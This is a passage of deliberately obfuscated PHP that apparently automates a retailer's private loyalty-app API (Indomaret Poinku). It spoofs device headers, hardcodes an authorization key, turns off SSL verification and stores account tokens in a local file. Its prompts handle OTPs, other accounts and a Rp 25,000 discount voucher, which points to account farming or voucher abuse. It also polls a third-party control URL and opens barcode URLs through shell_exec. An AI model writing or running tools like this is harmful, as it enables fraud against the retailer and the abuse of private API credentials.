  PLeOQ:
  echo "\xa";
  goto KWjZ5;
  ahQhu:
  echo @zm6ic("\x6e\145\166\x79", $YXsOG);
  goto cnUbl;
  ZO4Kj:
  echo "\xa";
  goto eefzo;
  SpiQk:
  if (!($fUekS == '')) {
    goto dvsNz;
  }
  goto eHSlO;
  NUXI3:
  echo "\xa";
  goto lMFbm;
  nOgbN:
  goto v8B4y;
  goto I9fin;
  M4L5M:
  echo "\12";
  goto PdwRl;
  v4M4o:
  $wDisp = "\173\x22\x70\x68\x6f\x6e\x65\x4e\165\155\x62\145\x72\42\72\x22" . $zn5zd . "\x22\54\x22\x64\x65\x76\x69\x63\x65\x49\x64\42\72\42" . $aY0el . "\42\175";
  goto V1jox;
  hJ8Yw:
  BzIvW:
  goto U0P17;
  DZWQy:
  $CdOss = "\x31\60\x30\x30\60\60\60\60";
  goto aSxUw;
  ctI1q:
  echo @zm6ic("\156\145\x76\171", $YXsOG);
  goto RTqsK;
  vuGa0:
  echo @zM6ic("\x79\145\x6c\154\157\167", "\x4e\141\155\x61\40\x44\x65\x73\x61\x20\x20\x20\x20\40\40\40\72\x20");
  goto wstM7;
  VCCS6:
  $wlJRC = xoZb4(array("\x7c"), $wZnHP)[1];
  goto MyAZJ;
  PNM0g:
  $BcbF3 = @$Ap1KM["\144\x61\x74\141"]["\x70\150\157\x6e\x65\x4e\165\155\142\145\x72"];
  goto UKSbZ;
  E_Op0:
  KV6h2:
  goto ZQ2mS;
  QNKX2:
  $aY0el = $v1ZMX;
  goto yFgwh;
  razQG:
  echo @ZM6Ic("\147\x72\x65\145\x6e", "\x4d\x61\x73\x75\153\x6b\x61\x6e\40\120\x61\163\163\x77\157\162\x64\x20\x44\145\166\x69\143\145\40\x41\156\x64\x61\40\72\x20");
  goto QfkH3;
  zddGh:
  $owfHy = json_decode($XTuz1, true);
  goto dFRET;
  pWN9s:
  echo "\xa";
  goto kSamf;
  bf2kg:
  $LD6vG = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinmot"));
  goto A0Vdd;
  RhKbU:
  echo "\12";
  goto ffkgN;
  EY27O:
  $m0f8X = explode("\xa", @file_get_contents("\155\171\x74\x6f\x6b\145\x6e"));
  goto w_Cs4;
  VE_Bb:
  $Jk9cx = G8PF2("\x68\x74\164\x70\x73\x3a\57\x2f\145\x64\164\x73\141\x70\160\x2e\151\156\x64\157\155\141\x72\x65\x74\160\157\x69\156\x6b\165\56\143\157\x6d\57\143\165\163\x74\157\x6d\x65\x72\57\141\160\x69\170\x2d\x31\65\x30\62\55\x61\x70\x69\57\155\157\142\x69\x6c\x65\x2f\x63\165\163\164\x6f\155\x65\x72\55\141\144\x64\x72\x65\163\x73", $aY0el, $GOXkU, $mlMLt);
  goto gT7PW;
  XUNNf:
  echo "\12";
  goto N_7zY;
  PCpFs:
  goto PG5CP;
  goto xQq0X;
  haa26:
  echo @zm6ic("\147\162\145\145\x6e", $wd9cN);
  goto lstXN;
  gwIsu:
  if (!($kTI3Y == '')) {
    goto CWwim;
  }
  goto qcX1a;
  sWc79:
  $Jk9cx = G8PF2("\x68\x74\164\x70\163\x3a\x2f\x2f\x65\144\x74\x73\x61\160\x70\56\151\156\x64\x6f\155\141\x72\145\164\x70\157\x69\x6e\x6b\x75\x2e\143\157\155\57\x6c\157\171\x61\x6c\x74\x79\x2f\141\160\x69\170\55\61\x35\60\62\55\x61\x70\x69\x2f\155\x6f\142\151\154\145\x2f\x72\145\x6d\x69\156\144\145\x72\x73\x2f\x6d\145", $aY0el, $GOXkU, $mlMLt);
  goto mBwSQ;
  MOApc:
  echo @zm6ic("\x79\145\154\154\x6f\167", "\12\x4f\x54\x50\x20\x41\116\x44\101\40\x53\x41\114\x41\110\54\x20\x53\x49\x4c\x41\x48\x4b\x41\x4e\x20\x49\x4e\x50\x55\x54\40\131\x41\116\x47\x20\102\x41\122\125\x21\41\12\12");
  goto sZ24Y;
  D2_Ke:
  $wDisp = "\x7b\x22\160\151\x6e\103\157\x64\145\42\72\42" . $earOL . "\x22\175";
  goto a2iK3;
  JFUAt:
  if ($kbWoT == "\x44\151\163\153\157\156\x20\x52\160\x20\x32\x35\56\60\60\x30\40\113\154\x69\x6b\40\x49\156\x64\157\155\x61\x72\x65\x74") {
    goto GVUqX;
  }
  goto z87ev;
  jmVzd:
  $efQM2 = count($QRhbE) - 1;
  goto rThth;
  bdqBC:
  echo @zM6ic("\156\145\166\171", $ABmxY);
  goto Qw0Sd;
  fWyr0:
  echo @zm6iC("\162\145\x64", "\12\176\x7e\x7e\x7e\x7e\176\x7e\176\x7e\x7e\176\x7e\x7e\176\x7e\x7e\176\176\176\x7e\176\176\176\176\x7e\176\176\176\176\176\x7e\x7e\176\x7e\176\176\176\176\176\x7e\176\x7e\176\x7e\x7e\x7e\176\176\12");
  goto diI12;
  XUHGp:
  $p4iky = @$Ap1KM["\144\x61\164\141"]["\155\x65\x6d\142\x65\x72\111\x64"];
  goto PMIzX;
  kgTcS:
  $XDyMm = @$Ap1KM["\x64\x61\164\141"]["\142\x61\x6c\141\156\143\x65"];
  goto h_PCX;
  dyoyZ:
  function GGgR_($lEbop, $wDisp = null)
  {
    goto OsG9f;
    ALvBY:
    $ruc3h[] = "\x63\x6f\x6e\x74\145\x6e\164\55\164\171\x70\145\72\40\x61\x70\x70\154\x69\143\x61\164\151\x6f\156\57\152\163\x6f\156\73\40\143\150\x61\162\x73\145\164\75\x55\124\x46\x2d\x38";
    goto E6YXP;
    GKBJf:
    print_r($AXlcQ);
    goto bgXrP;
    YHaQn:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto Fe2UM;
    EdcDf:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto QhwCb;
    bgXrP:
    return $ECuqv;
    goto CNED9;
    RC2Bh:
    $ECuqv = curl_exec($C6npe);
    goto RqCv5;
    wR88P:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto ohBYu;
    MomEj:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto s3mGo;
    QhwCb:
    goto NWvDg;
    goto XGcM2;
    BYogT:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto qMmNt;
    OsG9f:
    $C6npe = curl_init();
    goto YHaQn;
    E6YXP:
    $ruc3h[] = "\x75\163\x65\162\55\x61\x67\145\x6e\x74\x3a\x20\x6f\153\150\164\x74\160\x2f\x35\56\x30\56\60\x2d\x61\154\160\150\141\56\65";
    goto SB18M;
    ahrEx:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto BYogT;
    wkzgW:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x6b\x6c\151\x6b\56\x74\170\164");
    goto RC2Bh;
    RqCv5:
    $P7lm9 = curl_getinfo($C6npe);
    goto HFVq_;
    HFVq_:
    if (!$P7lm9) {
      goto XdH7G;
    }
    goto FuSII;
    FuSII:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto EdcDf;
    s3mGo:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto wR88P;
    V9mgM:
    NWvDg:
    goto HmWQ6;
    SB18M:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto MomEj;
    ohBYu:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\153\x6c\x69\x6b\56\164\x78\x74");
    goto wkzgW;
    Fe2UM:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto ahrEx;
    HmWQ6:
    $AXlcQ = json_decode($y7f11, true);
    goto GKBJf;
    qMmNt:
    $ruc3h[] = "\x61\165\x74\150\x6f\162\x69\x7a\x61\164\x69\157\156\72\40\x4e\116\x4b\x53\153\x54\144\x6f\x6f\121\157\x37\166\x55\x47\x56\x47\65\145\107\153\147\x59\x53\126\x57\x37\x53\141\x62\x53\152\x66\146\x61\x66\141\157\63\65\156\x66\157\141\156\x33\x79\x67\146\141\x61";
    goto ALvBY;
    XGcM2:
    XdH7G:
    goto SrrFs;
    SrrFs:
    return false;
    goto V9mgM;
    CNED9:
  }
  goto NEtRK;
  gD4Hv:
  $wd9cN = date("\144\55\155\55\x59\40\174\40\x48\72\151\x3a\163");
  goto BqeQN;
  uYg9g:
  echo "\x53\x61\155\160\141\151\40\x42\141\162\151\x73\x20\113\x65\x20\x3a\x20";
  goto b_gi8;
  naXLO:
  $Jk9cx = G8pF2("\x68\x74\x74\x70\163\x3a\57\57\x65\x64\x74\163\141\x70\160\x2e\151\x6e\144\x6f\155\141\162\145\164\160\x6f\x69\x6e\153\165\x2e\143\x6f\155\57\x63\165\x73\x74\x6f\x6d\x65\x72\57\x61\x70\x69\170\55\61\x35\x30\62\55\141\160\x69\x2f\x69\x73\55\x77\150\x61\x74\x73\x61\x70\160\x2d\166\145\162\151\146\151\145\x64", $aY0el, $GOXkU, $mlMLt);
  goto Zkmak;
  m280i:
  echo @Zm6ic("\x79\x65\x6c\154\x6f\x77", "\x4e\x61\155\141\x20\x4b\165\x70\157\x6e\156\171\141\40\40\40\x20\72\40");
  goto i8Wxa;
  CsTYI:
  $Jk9cx = G8pf2("\x68\164\x74\160\163\x3a\x2f\57\x65\x64\164\x73\141\160\x70\56\151\156\144\157\x6d\x61\x72\145\164\x70\x6f\151\156\153\x75\x2e\143\x6f\x6d\x2f\x63\x75\x73\164\x6f\155\x65\162\57\x61\x70\x69\x78\x2d\x31\65\60\x32\55\141\160\x69\x2f\155\157\142\x69\x6c\x65\x2f\144\145\x74\141\151\x6c\55\x63\x75\x73\164\x6f\x6d\145\162\55\157\162\151\147\151\156", $aY0el, $GOXkU, $mlMLt);
  goto wbvww;
  jjZVf:
  $u35jw = count($m0f8X) - 1;
  goto VQozi;
  TAwyA:
  echo @zM6Ic("\x72\145\x64", "\xa\x7e\176\x7e\176\176\x7e\176\x7e\x7e\176\x7e\176\x7e\176\176\x7e\x7e\x7e\176\176\176\x7e\176\176\176\x7e\x7e\x7e\x7e\x7e\x7e\176\176\x7e\176\176\176\176\x7e\x7e\176\x7e\x7e\x7e\x7e\x7e\176\x7e\12");
  goto x_9e2;
  QiKp7:
  $Jk9cx = g8PF2("\150\164\x74\160\x73\x3a\57\57\145\x64\x74\x73\141\160\x70\56\151\156\x64\x6f\x6d\141\x72\x65\x74\160\x6f\151\156\x6b\165\56\x63\x6f\155\57\154\x6f\171\x61\x6c\x74\x79\57\141\x70\151\170\x2d\x31\x35\x30\62\55\x61\x70\151\57\x6d\x6f\142\151\x6c\x65\x2f\x73\164\141\x6d\160\163\57\155\x65", $aY0el, $GOXkU, $mlMLt);
  goto ykUuj;
  wKmCR:
  $wDisp = "\173\x22\163\165\x62\104\x69\x73\164\162\151\143\x74\x22\72\42" . $ldzeo . "\42\x2c\x22\163\165\142\x44\x69\x73\x74\x72\151\x63\x74\x43\x6f\x64\145\x22\x3a\42" . $U_EVz . "\x22\54\x22\x76\x61\154\x75\x65\42\72\x22" . $xzAuu . "\42\175";
  goto zeS_n;
  TdnY9:
  $m5BZY = gGGr_("\150\x74\164\x70\163\x3a\x2f\x2f\x61\x73\x69\141\x2d\x73\157\165\164\x68\145\x61\x73\164\62\55\x69\x64\155\x2d\143\x6f\162\160\55\160\x72\x64\x2e\x63\154\x6f\165\x64\146\165\156\x63\164\151\157\156\x73\x2e\156\145\x74\57\151\144\155\x61\x70\x70\163\x5f\x74\162\141\x63\153\145\162\x5f\147\x61\x74\145\167\141\171", $wDisp);
  goto Lb03I;
  y8VKP:
  $jTEU0 = "\60";
  goto k2aOv;
  VQozi:
  $lPULW = $m0f8X;
  goto UuPZd;
  phNSJ:
  shell_exec("\163\x74\x61\162\x74\40\143\150\x72\x6f\x6d\x65\40\42\x68\164\164\160\163\x3a\57\57\x62\141\162\x63\x6f\144\145\x2e\164\145\143\x2d\x69\x74\56\143\157\x6d\x2f\x62\x61\x72\x63\x6f\x64\145\56\x61\163\x68\x78\77\x64\x61\164\141\x3d\42" . $p4iky . "\x22\46\143\157\144\x65\75\103\157\x64\x65\61\62\x38\x26\155\x75\154\164\151\x70\154\145\142\x61\162\143\x6f\x64\x65\163\x3d\146\x61\x6c\163\x65\x26\x74\162\x61\x6e\x73\x6c\141\x74\x65\55\145\x73\143\x3d\x74\162\165\145\x26\x75\x6e\151\164\x3d\x46\151\x74\46\x64\160\x69\75\x39\66\x26\151\155\x61\x67\x65\x74\171\160\x65\75\x47\151\146\46\x72\157\164\x61\164\151\x6f\x6e\75\60\x26\143\x6f\154\157\x72\75\x25\x32\x33\x30\x30\x30\x30\60\x30\46\x62\x67\x63\x6f\154\157\162\x3d\45\x32\63\x66\146\x66\x66\146\x66\x26\x63\x6f\x64\145\x70\141\x67\x65\x3d\x44\145\146\x61\x75\154\164\46\161\x75\x6e\x69\x74\x3d\x4d\x6d\x26\161\x75\x69\145\164\75\61\x30\46\150\x69\144\x65\150\162\164\x3d\106\141\154\x73\145\x22");
  goto RaRdi;
  cvmiq:
  $qtgR3++;
  goto jpdpf;
  Nz6rs:
  $Ap1KM = json_decode($upOL9, true);
  goto d9ZGt;
  Hzhxt:
  z3XBs:
  goto KAZAL;
  op03J:
  AQDm2:
  goto fyrrg;
  ukSNL:
  $k1y0B = G1wXt("\150\x74\164\x70\x73\x3a\x2f\x2f\145\144\164\x73\141\x70\160\x2e\x69\x6e\x64\157\155\141\x72\145\164\160\157\151\x6e\153\165\x2e\143\157\x6d\x2f\x6c\157\147\151\x6e\57\x61\160\x69\x78\x2d\61\65\60\x32\55\x61\160\x69\57\x6f\x70\145\x6e\x2f\x70\151\x6e\57\151\163\x2d\x70\151\x6e\x2d\x65\x78\151\163\x74", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto pHOIf;
  jZ12F:
  $Ap1KM = json_decode($upOL9, true);
  goto ihLm0;
  x0V_6:
  echo "\xa";
  goto M6siS;
  sqioU:
  $mlMLt = @$owfHy["\x64\x61\164\x61"]["\141\x63\x63\x65\163\x73\x5f\164\157\153\145\156"];
  goto hwdtM;
  AU3Y9:
  $w5ulg = str_replace("\xd", '', $TvVlh);
  goto YbjIM;
  v2L4I:
  $SD3v6 = @$owfHy["\x64\x61\x74\141"][0]["\x72\x65\x63\x69\x70\151\145\x6e\164\x45\x6d\x61\151\154"];
  goto Ydv5v;
  G_E8D:
  $QRhbE = explode("\xa", @file_get_contents("\155\x79\x74\x6f\x6b\145\156"));
  goto tbDFN;
  IYPI4:
  $gCIzy = @$owfHy["\144\x61\x74\x61"]["\143\x6f\x6e\x74\x65\156\x74"][$fM3_G]["\163\164\x61\x6d\x70\x45\170\x63\150\141\x6e\147\x65\x49\x64"];
  goto MRiKw;
  H_1h5:
  psmh5:
  goto UDy_g;
  hYPdD:
  $m5BZY = gGgR_("\150\x74\x74\x70\163\x3a\x2f\57\141\x73\x69\141\x2d\163\x6f\x75\x74\150\145\141\163\164\x32\55\x69\144\155\55\x63\157\162\x70\55\x70\x72\144\x2e\143\154\157\165\144\x66\x75\156\x63\x74\151\157\x6e\x73\x2e\156\145\x74\57\151\x64\155\x61\x70\x70\x73\x5f\x74\162\x61\143\153\x65\x72\137\x67\141\164\145\x77\141\x79", $wDisp);
  goto Ao7nr;
  KHl5h:
  $m5BZY = GGgR_("\150\x74\164\160\x73\x3a\57\57\141\x73\151\x61\x2d\163\157\x75\x74\x68\x65\141\x73\x74\x32\55\151\144\x6d\55\143\x6f\x72\x70\x2d\x70\162\144\56\x63\x6c\x6f\x75\144\x66\165\156\143\x74\151\157\x6e\163\56\156\x65\x74\57\x69\x64\155\141\x70\160\163\137\x74\162\x61\143\153\145\x72\137\x67\141\x74\145\167\141\171", $wDisp);
  goto Ul2z5;
  AIk12:
  echo @Zm6iC("\x79\x65\x6c\x6c\x6f\167", "\x4b\145\x79\167\x6f\162\144\40\40\x20\x20\x20\x20\40\40\40\72\x20");
  goto yEnw1;
  HdRao:
  echo "\x44\145\154\x65\164\x65\144\x20{$xp_1p}\x20\x20";
  goto P3s5s;
  a5HAT:
  $wd9cN = date("\144\55\155\x2d\131\x20\x7c\40\x48\72\x69\72\163");
  goto r2f9G;
  OlQAM:
  goto eyO14;
  goto cG1au;
  aIbLu:
  echo "\xa";
  goto GNQma;
  cjmuY:
  ODvt2:
  goto L05Ik;
  G6Vck:
  hRDFl:
  goto MJ9En;
  b3huw:
  echo @zM6ic("\171\145\x6c\154\x6f\167", "\x4c\x61\x6e\152\165\164\40\x42\x75\x61\x74\40\x41\x6c\141\x6d\141\x74\x20\x41\153\x75\x6e\x20\114\x61\x69\156\40\xa\12");
  goto cyP0m;
  RBPjd:
  $YUfPv = @$owfHy["\144\x61\164\141"][0]["\141\144\144\162\145\163\x73"];
  goto Rmpkm;
  dKfQt:
  $m5BZY = GGgR_("\x68\164\x74\160\163\72\x2f\x2f\141\163\151\x61\55\x73\157\165\x74\150\x65\141\163\164\x32\55\x69\144\x6d\x2d\x63\x6f\162\160\x2d\160\162\144\x2e\143\154\x6f\x75\x64\146\x75\x6e\143\164\x69\x6f\x6e\x73\x2e\156\x65\x74\x2f\151\144\x6d\141\160\x70\163\137\164\162\x61\143\x6b\x65\x72\x5f\147\141\x74\x65\x77\x61\171", $wDisp);
  goto N0JV1;
  EUpE7:
  if (!($cPDPt == 16)) {
    goto e1oJO;
  }
  goto aHEZg;
  rIxAs:
  echo "\xa";
  goto IWXpk;
  kXhiU:
  echo @ZM6ic("\171\x65\154\x6c\157\167", "\x50\157\x69\x6e\40\x41\x6b\165\x6e\x20\101\x6e\x64\141\x20\x3a\x20");
  goto U2vmb;
  emm3P:
  if (!($zn5zd == $rVPVc)) {
    goto NhM90;
  }
  goto QIBEy;
  SaVD_:
  print_r($zcN5u);
  goto x0V_6;
  qH6lQ:
  echo @Zm6iC("\171\x65\x6c\x6c\x6f\x77", "\120\x65\163\141\156\40\x20\40\40\40\40\40\40\x20\40\40\x20\40\x20\x3a\x20");
  goto OhQV5;
  sHcge:
  $f5jPx = json_decode($Ia9Ix, true);
  goto hJjFO;
  bnog9:
  echo @ZM6Ic("\162\x65\144", "\x4e\157\164\x69\143\145\x20\72\40");
  goto VlP2H;
  p6pym:
  echo @zM6iC("\162\145\x64", "\12\x7e\x7e\176\x7e\x7e\176\176\x7e\176\176\x7e\176\x7e\x7e\176\x7e\176\x7e\176\x7e\x7e\176\176\x7e\176\x7e\x7e\x7e\x7e\176\x7e\176\176\176\x7e\x7e\x7e\176\176\x7e\x7e\176\x7e\176\x7e\176\x7e\176\12");
  goto CmfSI;
  mTXKJ:
  echo @zm6ic("\x6e\x65\x76\171", "\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\101\x41\115\x49\111\x4e\x20");
  goto ee12d;
  IMPoy:
  echo @Zm6iC("\x72\145\x64", $qtgR3);
  goto zxj7y;
  PbA2u:
  $YYbml = @$H1g60["\141\x75\x74\x68\x54\157\x6b\x65\x6e"]["\164\157\x6b\x65\x6e"];
  goto RJm53;
  jBx5X:
  $Jk9cx = g8PF2("\150\164\164\160\x73\x3a\57\x2f\x65\144\x74\163\x61\160\x70\x2e\151\x6e\x64\x6f\x6d\141\x72\x65\x74\x70\x6f\x69\156\153\165\x2e\x63\157\155\57\143\x75\163\x74\157\155\145\x72\x2f\x61\160\151\x78\55\x31\65\60\62\x2d\141\x70\151\x2f\x69\x73\x2d\167\150\x61\164\x73\141\x70\160\55\x76\x65\x72\151\x66\x69\145\144", $aY0el, $GOXkU, $mlMLt);
  goto O_aCK;
  tYb9o:
  echo "\xa";
  goto lhclc;
  LihqS:
  echo @Zm6Ic("\x6e\145\x76\171", "\123\157\x72\162\171\54\x20\124\150\151\163\x20\123\143\x72\151\x70\164\40\x48\141\163\x20\x42\x65\x65\x6e\x20\122\145\155\x6f\166\145\x64\40\x42\x79\40\124\x68\x65\x20\x4f\167\156\x65\162\x21\x21");
  goto DcdsX;
  kT9ly:
  piuRU:
  goto zxVpE;
  fmZo2:
  echo "\xa";
  goto CCLK7;
  uHHvj:
  aCWFZ:
  goto EJmp3;
  eryO5:
  echo $jTEU0;
  goto Sxaeu;
  sBlfA:
  $BcbF3 = @$Ap1KM["\x64\141\x74\141"]["\160\x68\157\x6e\145\x4e\165\155\142\x65\x72"];
  goto UPPZ2;
  sYQLH:
  echo "\xa";
  goto tVubp;
  sNpwz:
  $SpzvW = g66lt("\x68\164\x74\160\163\x3a\57\x2f\x65\x64\x74\163\x61\x70\160\56\x69\156\144\x6f\x6d\141\162\x65\164\x70\x6f\151\x6e\x6b\x75\x2e\143\157\x6d\57\154\x6f\x67\151\156\57\141\x70\151\170\55\x31\x35\60\x32\55\141\160\151\57\x6f\x70\145\x6e\x2f\160\151\x6e\57\166\x61\x6c\151\144\141\164\145\x2d\160\x69\156", $wDisp, $aY0el);
  goto BqG2a;
  bnBRa:
  function qKr9F($FK_yc, $bQedf, $p5fm4, $Y33LL)
  {
    goto dRsKM;
    M_JVb:
    fclose($FhLCi);
    goto m0JrM;
    Mxoky:
    fputs($FhLCi, "{$bQedf}\x20\x3d\x20{$p5fm4}\x20\75\40{$Y33LL}\xa");
    goto M_JVb;
    dRsKM:
    $FhLCi = fopen($FK_yc, "\141");
    goto Mxoky;
    m0JrM:
  }
  goto eWqTD;
  XQRKG:
  Hw2pH:
  goto qIS9E;
  TKtco:
  echo @ZM6Ic("\171\x65\154\x6c\157\x77", "\x4e\141\155\x61\40\113\157\x74\x61\40\x20\40\40\x20\72\x20");
  goto sYy6d;
  CAqX2:
  function t8s2Z($lEbop, $wDisp = null, $eOlDi, $tj7_x)
  {
    goto NgnQa;
    iwN9r:
    $P7lm9 = curl_getinfo($C6npe);
    goto FEHs1;
    cMX0s:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\151\x6e\x64\x6f\56\x74\x78\164");
    goto k_xxi;
    u3uaM:
    $ECuqv = curl_exec($C6npe);
    goto iwN9r;
    E07xh:
    $ruc3h[] = "\173\x22\x61\160\x70\137\x76\145\x72\163\151\157\x6e\42\x3a\x22\x33\x2e\x31\63\56\60\42\x2c\42\x64\x65\x76\x69\x63\x65\137\143\154\x61\163\x73\42\72\42\120\x68\157\x6e\x65\x22\54\x22\144\145\166\x69\143\145\137\146\141\155\x69\154\171\x22\72\42" . $tj7_x . "\42\x2c\x22\x64\x65\166\x69\x63\x65\137\151\x64\x22\72\42" . $eOlDi . "\42\54\42\x6f\163\137\x6e\x61\155\145\x22\72\42\101\x6e\x64\162\157\151\x64\x20\x50\x22\x2c\x22\x6f\x73\137\166\145\x72\x73\x69\x6f\156\42\x3a\42\101\156\x64\162\157\151\144\40\x39\x22\175";
    goto ldtjp;
    pc8Gf:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto AVCcJ;
    tWFWS:
    print_r($AXlcQ);
    goto NFbeD;
    uHwib:
    $ruc3h[] = "\110\157\163\164\72\40\x65\144\164\163\x61\160\160\x2e\x69\156\x64\x6f\x6d\x61\162\x65\164\160\x6f\x69\x6e\153\165\56\143\157\x6d";
    goto e9kZ_;
    NgnQa:
    $C6npe = curl_init();
    goto Fufbn;
    gIRcP:
    $ruc3h[] = "\x75\x73\145\x72\55\x61\147\x65\x6e\x74\72\x20\x6f\153\150\164\164\x70\x2f\64\x2e\x39\x2e\60";
    goto Wk1Ca;
    AVCcJ:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto uM0Ik;
    uNmvu:
    $AXlcQ = json_decode($y7f11, true);
    goto tWFWS;
    FEHs1:
    if (!$P7lm9) {
      goto Vhd8h;
    }
    goto MEBWv;
    ccUvF:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto bg97u;
    bg97u:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto KIU3_;
    Zu1Pt:
    return false;
    goto Cz69w;
    ldtjp:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto pc8Gf;
    Cz69w:
    T9llq:
    goto uNmvu;
    KIU3_:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto gIRcP;
    e9kZ_:
    $ruc3h[] = "\143\x6f\156\x74\145\x6e\164\55\x74\171\x70\145\x3a\x20\x61\160\x70\x6c\x69\143\x61\x74\x69\x6f\156\x2f\152\x73\157\x6e\73\40\x63\150\x61\x72\163\145\x74\75\125\x54\106\55\70";
    goto cGxrw;
    k_xxi:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\151\x6e\x64\157\x2e\164\170\x74");
    goto u3uaM;
    uM0Ik:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto cMX0s;
    lxEuu:
    Vhd8h:
    goto Zu1Pt;
    Jtxpv:
    goto T9llq;
    goto lxEuu;
    Wk1Ca:
    $ruc3h[] = "\141\143\143\x65\160\x74\x2d\x65\x6e\143\x6f\x64\151\x6e\x67\x3a\x20\147\172\x69\160";
    goto uHwib;
    cGxrw:
    $ruc3h[] = "\153\x65\x79\72\x20\132\x57\x52\x30\143\172\x49\167\115\152\x45\x36\115\110\x42\163\142\127\x39\x72\142\x67\75\75";
    goto E07xh;
    MEBWv:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto xFaEb;
    NFbeD:
    return $ECuqv;
    goto QSCbo;
    xFaEb:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto Jtxpv;
    Fufbn:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto ccUvF;
    QSCbo:
  }
  goto GgRFr;
  VGfv_:
  echo shell_exec("\x78\x64\147\x2d\x6f\x70\145\x6e\x20\42\150\164\164\160\x73\x3a\57\x2f\x62\x61\x72\143\157\144\145\x2e\164\x65\x63\55\151\164\56\x63\157\x6d\57\x62\x61\x72\x63\157\144\x65\x2e\141\163\150\170\x3f\144\141\x74\x61\x3d\42" . $p4iky . "\x22\x26\x63\x6f\x64\145\x3d\103\157\x64\x65\x31\x32\70\x26\155\165\154\x74\x69\160\154\x65\x62\141\x72\x63\x6f\x64\x65\x73\75\x66\x61\x6c\163\145\46\164\x72\141\156\163\x6c\141\x74\x65\55\145\x73\143\75\164\162\165\x65\46\165\156\151\x74\75\x46\151\164\x26\144\x70\151\75\x39\66\x26\151\x6d\141\x67\145\x74\x79\160\145\x3d\x47\151\146\x26\x72\x6f\x74\141\164\151\x6f\156\75\60\46\x63\157\154\157\x72\75\45\x32\x33\x30\x30\60\x30\60\60\x26\x62\147\143\157\x6c\157\x72\x3d\45\62\x33\146\x66\x66\146\146\146\x26\143\x6f\x64\145\x70\x61\147\145\x3d\104\x65\146\x61\165\x6c\164\46\161\165\x6e\x69\164\75\x4d\155\46\161\x75\151\145\164\x3d\x31\60\x26\150\x69\144\145\150\x72\x74\x3d\x46\x61\x6c\163\x65\x22");
  goto kJkzB;
  eT4LJ:
  eyO14:
  goto oujxp;
  i5Kia:
  $wDisp = "\x7b\x22\x70\x68\157\156\x65\116\165\155\142\145\x72\x22\72\42" . $zn5zd . "\x22\54\42\x64\x65\166\x69\143\x65\x49\x64\42\72\x22" . $aY0el . "\x22\175";
  goto xMSWM;
  jlEpj:
  $a7K8a = jLw7P("\150\164\x74\160\x73\x3a\57\x2f\146\x69\x72\x65\x62\x61\163\x65\x69\156\163\x74\x61\154\154\141\164\151\157\x6e\163\x2e\147\157\157\147\154\x65\141\160\x69\x73\x2e\143\157\x6d\57\x76\x31\x2f\160\162\157\152\145\x63\164\163\57\x69\x64\x6d\x2d\143\157\162\160\x2d\x70\x72\x64\57\x69\156\x73\x74\x61\154\x6c\141\x74\151\157\x6e\163", $wDisp);
  goto NO6kH;
  chPVV:
  $R_bYC = @$nPb0z["\x64\141\164\141"]["\x69\144"];
  goto eu_9w;
  ZbVXq:
  Js11p:
  goto kS9F0;
  TOHQ1:
  echo "\12";
  goto mL6ay;
  F0uMw:
  $Jk9cx = G8PF2("\x68\x74\x74\x70\x73\72\57\57\145\144\164\163\141\x70\x70\56\x69\156\x64\157\155\141\162\x65\x74\160\157\x69\x6e\153\165\56\143\157\x6d\x2f\x63\165\163\x74\157\x6d\x65\x72\57\141\160\x69\170\x2d\61\65\x30\62\55\141\160\x69\57\151\x73\55\x77\x68\141\164\163\141\x70\x70\55\x76\x65\x72\151\146\x69\145\144", $aY0el, $GOXkU, $mlMLt);
  goto tRe9c;
  SVrQX:
  echo "\123\141\155\160\x61\x69\40\x42\141\162\151\x73\40\113\x65\x20\x3a\x20";
  goto Qj0f7;
  E0app:
  echo @ZM6iC("\162\145\x64", "\12\x7e\x7e\x7e\x7e\x7e\x7e\176\176\x7e\176\x7e\176\176\176\176\x7e\x7e\x7e\x7e\176\176\x7e\x7e\176\176\176\176\176\x7e\176\x7e\x7e\176\176\x7e\x7e\x7e\176\x7e\176\x7e\176\x7e\176\x7e\176\x7e\176\12");
  goto oqhQc;
  qOgWC:
  goto yj7_K;
  goto yvEV4;
  sjkH3:
  lqjr6("\155\171\164\x6f\153\145\156", $zn5zd, $mlMLt);
  goto Hzhxt;
  wS3V9:
  $QRhbE = explode("\12", @file_get_contents("\155\x79\x74\x6f\153\x65\x6e"));
  goto AAZZf;
  FA82m:
  echo @ZM6Ic("\x67\x72\145\x65\156", $wd9cN);
  goto oR8Sv;
  KuMZj:
